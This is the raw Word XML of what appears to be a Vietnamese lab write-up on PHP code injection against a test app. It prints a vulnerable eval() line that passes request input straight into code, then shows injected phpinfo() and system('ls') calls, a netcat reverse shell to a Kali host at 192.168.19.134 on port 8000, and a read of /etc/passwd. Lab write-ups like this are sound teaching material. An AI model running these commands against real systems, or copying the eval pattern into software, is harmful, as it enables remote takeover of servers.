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A5161" w14:textId="59C73840" w:rsidR="00411158" w:rsidRDefault="00BA348D">
      <w:r>
        <w:t xml:space="preserve">             PHP Code Injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6E3AA" w14:textId="21A1B451" w:rsidR="00BA348D" w:rsidRDefault="00BA348D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</w:p>
    <w:p w14:paraId="2756AE0F" w14:textId="07ED416A" w:rsidR="00BA348D" w:rsidRDefault="00BA348D">
      <w:r w:rsidRPr="00BA348D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33F33C80" wp14:editId="2AAF2A4C">
            <wp:extent cx="5943600" cy="4107180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="86001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97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EA53" w14:textId="32F047F1" w:rsidR="00BA348D" w:rsidRDefault="00BA348D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message </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB68C3" w14:textId="17F679C4" w:rsidR="00BA348D" w:rsidRDefault="00BA348D">
      <w:r w:rsidRPr="00BA348D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65AA08A7" wp14:editId="7C26858C">
            <wp:extent cx="5943600" cy="4093845"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="86199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97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8105" w14:textId="3FF09E03" w:rsidR="00BA348D" w:rsidRDefault="00BA348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test.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ur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message = test – 1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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0147D" w14:textId="1EC8C8AA" w:rsidR="00BA348D" w:rsidRDefault="00BA348D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check source code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phpi.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43733F03" w14:textId="1CBA0176" w:rsidR="00BA348D" w:rsidRDefault="00BA348D">
      <w:r w:rsidRPr="00BA348D">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D6BE12" wp14:editId="27BB056E">
            <wp:extent cx="5870222" cy="3302000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33262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9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208" cy="33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021A" w14:textId="665DCADD" w:rsidR="00BA348D" w:rsidRDefault="00BA348D">
      <w:r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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219C6C53" w14:textId="6D501C4F" w:rsidR="00BA348D" w:rsidRDefault="00BA348D">
      <w:r w:rsidRPr="00BA348D">
        <w:t>&lt;p&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t>&gt;&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t xml:space="preserve"> @eval ("echo " . $_REQUEST["message"] . ";");?&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA348D">
        <w:t>&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6F18FF" w14:textId="42D8D716" w:rsidR="00BA348D" w:rsidRDefault="00BA348D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1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eval()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qua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1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validate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 w:rsidR="006A1349">
        <w:t>người</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>dùng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>sẽ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> inject </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>những</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>đoạn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>độc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>hại</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>chương</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349">
        <w:t>trình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130A0CD" w14:textId="62D0E21B" w:rsidR="006A1349" w:rsidRDefault="006A1349">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Đầu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inject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phpinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E41C80B" w14:textId="37D59BBF" w:rsidR="006A1349" w:rsidRDefault="006A1349">
      <w:r w:rsidRPr="006A1349">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C4C3A8" wp14:editId="0577CA8B">
            <wp:extent cx="5943600" cy="4450715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="97594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46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44BA" w14:textId="77777777" w:rsidR="006A1349" w:rsidRDefault="006A1349"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5.2.4-2ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37F4F9" w14:textId="77777777" w:rsidR="006A1349" w:rsidRDefault="006A1349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system().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36167F2B" w14:textId="29998A1F" w:rsidR="002B78BA" w:rsidRDefault="002B78BA">
      <w:r>
        <w:t>system(‘ls ’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28156F16" w14:textId="14D05216" w:rsidR="002B78BA" w:rsidRDefault="002B78BA">
      <w:r w:rsidRPr="002B78BA">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E9D469" wp14:editId="57FBE5B0">
            <wp:extent cx="5943600" cy="4384040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="78600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6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BEFC" w14:textId="0AA21193" w:rsidR="002B78BA" w:rsidRDefault="002B78B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6A4054EF" w14:textId="2EC08DC3" w:rsidR="006A1349" w:rsidRPr="00D30425" w:rsidRDefault="00D30425">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>ystem(</w:t>
      </w:r>
      <w:r w:rsidR="002B78BA" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.19.13</w:t>
      </w:r>
      <w:r w:rsidR="002B78BA" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000 -e /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B78BA" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="006A1349" w:rsidRPr="00D30425">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E9EC7C" w14:textId="0820059D" w:rsidR="006A1349" w:rsidRDefault="006A1349"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netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> listener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kali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192.168.19.134 port 8000  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B994C54" w14:textId="67CBBCA6" w:rsidR="00DE2395" w:rsidRDefault="00DE2395">
      <w:r w:rsidRPr="00DE2395">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E111834" wp14:editId="023DF5D6">
            <wp:extent cx="5943600" cy="2719070"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="206894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46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9715" w14:textId="17CE17C4" w:rsidR="00DE2395" w:rsidRDefault="00DE2395">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lệnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17302D" w14:textId="018D9C10" w:rsidR="00DE2395" w:rsidRDefault="00DE2395">
      <w:r w:rsidRPr="00DE2395">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30A8BA80" wp14:editId="647EEF20">
            <wp:extent cx="5943600" cy="2733675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="30885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55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A17A" w14:textId="63344C25" w:rsidR="00DE2395" w:rsidRDefault="00DE2395">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1D9CA" w14:textId="00BEC3AE" w:rsidR="00DE2395" w:rsidRDefault="00DE2395">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Vậy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kali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sectPr w:rsidR="00DE2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8D"/>
    <w:rsid w:val="002B78BA"/>
    <w:rsid w:val="00411158"/>
    <w:rsid w:val="006A1349"/>
    <w:rsid w:val="00BA20FC"/>
    <w:rsid w:val="00BA348D"/>
    <w:rsid w:val="00D30425"/>
    <w:rsid w:val="00DE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7E57B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6B546FB7-3841-4CA3-BA4D-39AF74CC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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-07-23T10:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-23T12:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>